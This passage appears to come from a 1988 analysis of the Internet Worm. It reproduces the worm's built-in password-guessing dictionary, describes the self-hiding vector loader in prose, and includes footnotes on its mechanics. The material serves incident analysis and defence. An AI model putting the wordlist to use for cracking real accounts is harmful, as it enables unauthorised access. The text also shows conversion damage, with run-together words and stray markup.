of passwords, probably in some known \(to the author\) computing
environment. That is, some dictionary-based or brute-force attack
was used to crack a selection of a few hundred passwords taken
>From a small set of machines. Other approaches to gathering
passwords could also have been used\320Ethernet monitors, Trojan
Horse login programs, etc. However they may have been cracked,
the ones that were broken would then have been added to this
dictionary. Interestingly enough, many of these words are not in
the standard on-line dictionary \(in /usr/dict/words\). As such,
these words are useful as a supplement to the main dictionary-
based attack the worm used as strategy #4, but I would suspect
them to be of limited use before that time. This unusual
composition might be useful in the determination of the
author\(s\) of this code. One approach would be to find a system
with a user or local dictionary containing these words. Another
would be to find some system\(s\) where a significant quantity of
passwords could be broken with this list. aaa academia aerobics
airplane albany albatross albert alex alexander algebra aliases
alphabet ama amorphous analog anchor andromache animals answer
anthropogenic anvils anything aria ariadne arrow arthur athena
atmosphere aztecs azure bacchus bailey banana bananas bandit
banks barber baritone bass bassoon batman beater beauty beethoven
beloved benz beowulf berkeley berliner beryl beverly bicameral
bob brenda brian bridget broadway bumbling burgess campanile
cantor cardinal carmen carolina caroline cascades castle cat
cayuga celtics cerulean change charles charming charon chester
cigar classic clusters coffee coke collins commrades computer
condo cookie cooper cornelius couscous creation creosote cretin
daemon dancer daniel danny dave december defoe deluge desperate
develop dieter digital discovery disney dog drought duncan eager
easier edges edinburgh edwin edwina egghead eiderdown eileen
einstein elephant elizabeth ellenemeraldengine engineer
enterprise enzyme ersatz establish estate euclid evelyn extension
fairway felicia fender fermat fidelity finite fishers flakes
float flower flowers foolproof football foresight format forsythe
fourier fred friend frighten fun fungible gabriel gardner
garfield gauss george gertrude ginger glacier gnu golfer gorgeous
gorges gosling gouge graham gryphon guestguitargumption guntis
hacker hamlet handily happening harmony harold harvey hebrides
heinlein hello help herbert hiawatha hibernia honey horse horus
hutchins imbroglio imperial include ingres inna innocuous
irishman isis japan jessica jester jixian johnny joseph joshua
judith juggle julia kathleen kermit kernel kirkland knight ladle
lambda lamination larkin larry lazaruslebesguelee leland leroy
lewis light lisa louis lynne macintosh mack maggot magic malcolm
mark markus marty marvin master maurice mellon merlin mets
michael michelle mike minimum minsky moguls moose morley mozart
nancy napoleon nepenthe ness network newton next noxious
nutrition nyquist oceanography ocelot olivetti olivia oracle orca
orwell osirisoutlawoxford pacific painless pakistan pam papers
password patricia penguin peoria percolate persimmon persona pete
peter philip phoenix pierre pizza plover plymouth polynomial
pondering pork poster praise precious prelude prince princeton
protect protozoa pumpkin puneet puppet rabbit rachmaninoff
rainbow raindrop raleigh random rascal really rebecca remote rick
ripple robotics rochesterrolexromano ronald rosebud rosemary
roses ruben rules ruth sal saxon scamper scheme scott scotty
secret sensor serenity sharks sharon sheffield sheldon shiva
shivers shuttle signature simon simple singer single smile smiles
smooch smother snatch snoopy soap socrates sossina sparrows spit
spring springer squires strangle stratford stuttgart subway
success summer supersuperstage support supported surfer suzanne
swearer symmetry tangerine tape target tarragon taylor telephone
temptation thailand tiger toggle tomato topography tortoise
toyota trails trivial trombone tubas tuttle umesh unhappy unicorn
unknown urchin utility vasant vertigo vicky village virginia
warren water weenie whatnot whiting whitney will william
williamsburg willie winston wisconsinwizardwombat woodwind
wormwood yacov yang yellowstone yosemite zap zimmerman
Appendix B The Vector Program
The worm was brought over to each machine it infected via the
actions of a small program I call the vector program. Other
individuals have been referring to this as the grappling hook
program. Some people have referred to it as the program, since
that is the suffix used on each copy. The source for this program
would be transferred to the victim machine using one of the
methods discussed in the paper. It would then be compiled and
invoked on the victim machine with three command line arguments:
the canonical IP address of the infecting machine, the number of
the TCP port to connect to on that machine to get copies of the
main worm files, and a magic number that effectively acted as a
one-time-challenge password. If the ``server'' worm on the remote
host and port did not receive the same magic number back before
starting the transfer, it would immedi- ately disconnect from the
vector program. This can only have been to prevent some- one from
attempting to ``capture'' the binary files by spoofing a worm
``server.'' This code also goes to some effort to hide itself,
both by zeroing out the argu- ment vector, and by immediately
forking a copy of itself. If a failure occurred in transferring a
file, the code deleted all files it had already transferred, then
it exited. One other key item to note in this code is that the
vector was designed to be able to transfer up to 20 files; it was
used with only three. This can only make one wonder if a more
extensive version of the worm was planned for a later date, and
if that version might have carried with it other command files,
password data, or possibly local virus or trojan horse programs.
<<what follows is a pair of programs that I was unable to decode
with any dependability>>
References:
BSD is an acronym for Berkeley Software Distribution.
UNIX is a registered trademark of AT&T Laboratories.
VAX is a trademark of Digital Equipment Corporation.
The second edition of the book, just published, has been
``updated'' to omit this subplot about VIRUS.
%%Page: 4 5
5
It is probably a coincidence that the Internet Worm was loosed on
November 2, the eve of this ``birthday.''
6
Note that a widely used alternative to sendmail, MMDF, is also
viewed as too complex and large by many users. Further, it is
not perceived to be as flexible as sendmail if it is necessary
to establish special addressing and handling rules when bridging
heterogeneous networks.
7
Strictly speaking, the password is not encrypted. A block of zero
bits is repeatedly encrypted using the user password, and the
results of this encryption is what is saved. See [Morr79] for
more details.
8
Such a list would likely include all words in the dictionary, the
reverse of all such words, and a large collection of proper
names.
8
rexec is a remote command execution service. It requires that a
username/password combination be supplied as part of the
request.
9
This was compiled in as port number 23357, on host 127.0.0.1 \(loopback\).
10
Using TCP port 11357 on host 128.32.137.13.
11
Interestingly, although the program was coded to get the address
of the host on the remote end of point-to-point links, no use
seems to have been made of that information.
12
As if some of them aren't suspicious enough!
13
This appears to be a bug. The probable assumption was that the
routine hl would handle infection of local hosts, but hl calls
this routine! Thus, local hosts were never infected via this
route.
14
This is puzzling. The appropriate file to scan for equivalent
hosts would have been the .rhosts file, not the .forward file.
15
Private communication from someone present at the meeting.
16
The thought of a Sequent Symmetry or Gould NP1 infected with
multiple copies of the worm presents an awesome \(and awful\)
thought. The effects noticed locally when the worm broke into a
mostly unloaded VAX 8800 were spectacular. The effects on a
machine with one or two orders of magnitude more capacity is a
frightening thought.
17
Developed by Kevin Braunsdorf and Rich Kulawiec at Purdue PUCC.
18
Rick Adams, of the Center for Seismic Studies, has commented that
we may someday hear that the worm was loosed to impress Jodie
Foster. Without further information, this is as valid a
speculation as any other, and should raise further disturbing
questions; not everyone with access to computers is rational and
sane, and future attacks may reflect this.
19
Throughout this paper I have been writing author\(s\) instead of
author. It occurs to me that most of the mail, Usenet postings,
and media coverage of this incident have assumed that it was
author \(singular\). Are we so unaccustomed to working together
on programs that this is our natural inclination? Or is it that
we find it hard to believe that more than one individual could
have such poor judgement? I also noted that most of people I
spoke with seemed to assume that the worm author was male. I
leave it to others to speculate on the value, if any, of these
observations.
